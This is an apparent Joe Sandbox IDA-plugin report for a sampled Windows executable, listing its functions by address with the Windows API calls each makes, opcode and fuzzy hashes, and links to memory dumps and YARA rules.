Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 927720c7047493621f0b7e3b84dfc3f602cafed76d0d9322b89816998f2c7942
Instruction ID: 9ea8ee9990242640753daec223a204cd0a6fec3dd44334e9af3b8f1d4486775c
Opcode Fuzzy Hash: 927720c7047493621f0b7e3b84dfc3f602cafed76d0d9322b89816998f2c7942
Instruction Fuzzy Hash: 7DC22C71E086288FDF29CE28EE847EAB7B5EB44315F1541EAD44DE7240E774AE818F40

Function 0018D242 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0018D24E
IsDebuggerPresent.KERNEL32 ref: 0018D31A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0018D33A
UnhandledExceptionFilter.KERNEL32(?), ref: 0018D344

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f7c6a9caa9a1df6c989d2e0577be1a6b23eaca2160096b48e3057805b33c2294
Instruction ID: 832bd49f00a2bbe368d9f34bb0a0fb7a1468a0aa6df21033359db3adff62db53
Opcode Fuzzy Hash: f7c6a9caa9a1df6c989d2e0577be1a6b23eaca2160096b48e3057805b33c2294
Instruction Fuzzy Hash: 29310875D013189BDB11EFA4D989BCCBBB8BF14300F10419AE50DAB290EB705B85CF05

Function 00172E6F Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00172E73
FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00172E94
_wcslen.LIBCMT ref: 00172EA3
LocalFree.KERNEL32(?), ref: 00172EB6

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage_wcslen
String ID:
API String ID: 991192900-0
Opcode ID: 22b3f15957607e176a928dbba1520c44dfe8a644e033a382865db5f1b07bd5eb
Instruction ID: 6368b1079ccedea8a8039c8fad336a70b2622c2de28af69121d4438b13940ce9
Opcode Fuzzy Hash: 22b3f15957607e176a928dbba1520c44dfe8a644e033a382865db5f1b07bd5eb
Instruction Fuzzy Hash: 71F08275600204BBEB089BA59E05DFF777C9B85750B10C058F905A7540CB749E82D674

Function 0018BC1D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0018BB62,0000001C,0018BD57,00000000,?,?,?,?,?,?,?,0018BB62,00000004,001CB520,0018BDE7), ref: 0018BC2E
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0018BB62,00000004,001CB520,0018BDE7), ref: 0018BC49

Strings

D, xrefs: 0018BC3D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 9d1e02fed7e9849123b4848b988f867700cec7fdf871352c8fd230570dee5878
Instruction ID: 40303b036d697e664d8b799cf96c268564a2274a54190d6d4f6938405d7786d7
Opcode Fuzzy Hash: 9d1e02fed7e9849123b4848b988f867700cec7fdf871352c8fd230570dee5878
Instruction Fuzzy Hash: 8A01DB72604109ABDB14EE29DC45BDE7BA9EFD4324F0CC224ED59D7154DB34D9418B80

Function 001912B4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0018C17E), ref: 001913AC
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0018C17E), ref: 001913B6
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0018C17E), ref: 001913C3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7309a5c8240994cd6fc966574bf0102efa6ff5258dcd8ce550b9eaac89f58f9f
Instruction ID: 6914acf571e4ef3f5f6873f0f05987ce34c3c412c9dc7547c15157a04ed55935
Opcode Fuzzy Hash: 7309a5c8240994cd6fc966574bf0102efa6ff5258dcd8ce550b9eaac89f58f9f
Instruction Fuzzy Hash: 0D31C47590132DABCB21DF68D88979CBBB8BF18310F5041DAE81CA7690EB709F818F44

Function 001986E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0019887B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 23866a62fbcdc21db6378a15dca2aa2c1fe1982df8a094f94a3f62ddf0bdf079
Instruction ID: f8f2ac1bbd79084bac1a752dca87006726b5397eee3382add9fc9ca1a188ff5b
Opcode Fuzzy Hash: 23866a62fbcdc21db6378a15dca2aa2c1fe1982df8a094f94a3f62ddf0bdf079
Instruction Fuzzy Hash: 1B31E6719002496FDF289EB8CC85EFB7BBDDB86314F1401A8F41997292EB319D448B50

Function 0019AA50 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfdb16e9976882d12b85e4a6a493654685016078fef5a2c446867b91eb1d5b38
Instruction ID: 18e609ca951c48a072d70991ffba9beae55d9914c82fbc4342041bf605593ae0
Opcode Fuzzy Hash: bfdb16e9976882d12b85e4a6a493654685016078fef5a2c446867b91eb1d5b38
Instruction Fuzzy Hash: EC022B71E002199FDF18CFA9C8906ADBBF1FF88314F658269D819EB340D731AA458B91

Function 00186CF5 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00186D2B
GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE6E4,?,?), ref: 00186D74

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 3919de3005f18c8211a499a3baecdc67322dc97078fd76f1d777729875e9cfad
Instruction ID: 5873befd092e0ea3e4fa3de9cebc39595548598e1e02426a91bdeb2d8dac31fc
Opcode Fuzzy Hash: 3919de3005f18c8211a499a3baecdc67322dc97078fd76f1d777729875e9cfad
Instruction Fuzzy Hash: D9117975211208AAD701DF64DC01FAF77F9EF19300F40842AFA05A7690D370AA84CB65

Function 0019EE32 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0019EE2D,?,?,00000008,?,?,0019EACD,00000000), ref: 0019F05F

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f79b60394cd92816a078f48a5f5f745463c23ad53ee1ceb512e2a1a6effea6ec
Instruction ID: e085be1b97473e4249880305b754e8ce2fb5b420eb7220f45bbfeef0612c4d45
Opcode Fuzzy Hash: f79b60394cd92816a078f48a5f5f745463c23ad53ee1ceb512e2a1a6effea6ec
Instruction Fuzzy Hash: 10B13F31610609DFDB19CF28C48AB657BE1FF45364F29866DE899CF2A2C335D992CB40

Function 0018D05E Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0018D074

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 17925c5e42cefac0d5912375ecc79afe1ec29bb6760d1a12b22ba59df21b6507
Instruction ID: 0bb2600a025739b4004b7d3763d6f7530438934c41a9e2385d4c79ec9617beab
Opcode Fuzzy Hash: 17925c5e42cefac0d5912375ecc79afe1ec29bb6760d1a12b22ba59df21b6507
Instruction Fuzzy Hash: 6F518FB1D107058FEB18DFA9E8867AABBF5FB48310F14842AD405EB6A0D375DA41CF50

Function 0017FBD3 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

c, xrefs: 0017FEF4

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: 9d6b17cb8980368b4ca3da69603f03e176f3b35297cbec25d4a2cdc700c2f031
Instruction ID: 7fec7b5076923c6e1bb12178f55dbfea148665c9d1ff042d041ec7c24562134f
Opcode Fuzzy Hash: 9d6b17cb8980368b4ca3da69603f03e176f3b35297cbec25d4a2cdc700c2f031
Instruction Fuzzy Hash: 35E13675A083558FC729DF28D480A6BF7F1BB88348F11893EE89997351D730A946CF42

Function 00175032 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00175063

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: d619c8e5de34073e8ac4581fae9d8771f096770370ab40d2eba6574e9c1113a1
Instruction ID: c348ce209c05ec685f9ca0354513ed8ceb3d93a1cb06ea8df5f9912143ae53cc
Opcode Fuzzy Hash: d619c8e5de34073e8ac4581fae9d8771f096770370ab40d2eba6574e9c1113a1
Instruction Fuzzy Hash: AB014B70A00208CFD728DF68ED51A9D77F2BB49314F208618F92A93791E770AA858F40

Function 0018D3E5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001D400,0018CE75), ref: 0018D3EA

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 628dd0cd9fd1fcec5f3e567560eaa12a17950faa06d9f137baf0033008eeb8c2
Instruction ID: 6323ff9db5f00b9b134db54458d10a86fd845beae1d1baf714de80121170dad0
Opcode Fuzzy Hash: 628dd0cd9fd1fcec5f3e567560eaa12a17950faa06d9f137baf0033008eeb8c2
Instruction Fuzzy Hash:

Function 001993D0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 001993D0

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 82c2aca08041d6e105f4bc07945b872400c73875c257a14df610cb56ed316267
Instruction ID: f7dd4c68d6370f7815d5489a672e42d5b1ab42cb442f36ec620d0b6115063959
Opcode Fuzzy Hash: 82c2aca08041d6e105f4bc07945b872400c73875c257a14df610cb56ed316267
Instruction Fuzzy Hash: CAA001706562018B97808F3AAE9A6493AAAAB46A91B058069E505C5A60EB348491AF01

Function 00178D89 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10cbf7604baf462b1d0f7a410d3f9693d953a90b2e1a079bcb30284bb94946d4
Instruction ID: 6e54442646957086ea05bb747165fd66c1dd0b32ae2b6c4e9c7bc957a8389f79
Opcode Fuzzy Hash: 10cbf7604baf462b1d0f7a410d3f9693d953a90b2e1a079bcb30284bb94946d4
Instruction Fuzzy Hash: D2524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00180870 Relevance: .6, Instructions: 621COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1de4f6d40cda86ee587d5d7d498e822294e383bc4a09da5ea8dd203769b46d5
Instruction ID: 2373041d7340461144697e7ab4294e491703ff53473286315659e52008c45fa0
Opcode Fuzzy Hash: f1de4f6d40cda86ee587d5d7d498e822294e383bc4a09da5ea8dd203769b46d5
Instruction Fuzzy Hash: 0B22F57190471D8BC766EF58DC9442ABBE1FF98328F150A1DF8A197391D730DA898F82

Function 0017837D Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a83813c1d231c1dff236a8c6d20c4c2446dbafe787cacd3a7110b4a3606fd0
Instruction ID: bf22d6c7081eabb23cac8015b08660cbc8c0628a0d2d4411deded85a9117677d
Opcode Fuzzy Hash: e4a83813c1d231c1dff236a8c6d20c4c2446dbafe787cacd3a7110b4a3606fd0
Instruction Fuzzy Hash: 34D158745082C19FC704CF59E8D086ABBF0AB9A304F098A5EF5D597792C331EA56CBB1

Function 001927A7 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecc006279f16d3e85f1f07f6f761ebfed9f7365b7a43a4ef2d669a8af9c0a46
Instruction ID: f6f6c6290f67701d38b7016e03a091104e45bfee21a799e8fd2738d874c6759c
Opcode Fuzzy Hash: 1ecc006279f16d3e85f1f07f6f761ebfed9f7365b7a43a4ef2d669a8af9c0a46
Instruction Fuzzy Hash: 43617B71B4032976DE3C9A284855BFE23D8FB52748F24091AE883DF281D735EE86C355

Function 00192578 Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: c3cbe40f10f377f746bdb45489f33b0d09a1f2dc28d509bae32085034a281da3
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 41519E7060174477EF3C9DAC84657FF27D99B26300F190A1ADC82E7A82DB35EE458762

Function 00178934 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d1aed2d6ba4704f4e3cbb88a3e7ab26818e347d4022e8e0030761a2aae800e
Instruction ID: 4c3818beb765da2b109c11f802dfec9e44f4afa285484f9d71ab8a541d7dbdba
Opcode Fuzzy Hash: e0d1aed2d6ba4704f4e3cbb88a3e7ab26818e347d4022e8e0030761a2aae800e
Instruction Fuzzy Hash: B251E4316483954FC711DF28854846EBFF0AEDA324F5A899AE4D94B142D730EB4ACB62

Function 00172606 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7390a92b67c97bb6386d99c391e49f1c7c7cf1a0797bcbd692ebf4bf6df5b084
Instruction ID: 0f1fe4370970689a8aa3f1849c8ee5626bb0b35345fa7e0f330ced251e7c0556
Opcode Fuzzy Hash: 7390a92b67c97bb6386d99c391e49f1c7c7cf1a0797bcbd692ebf4bf6df5b084
Instruction Fuzzy Hash: D7410A70501711CFC71ADF34D5559A6B7F0FF5A700B1288AFE46A8B261EB30E608DB59

Function 0018E430 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

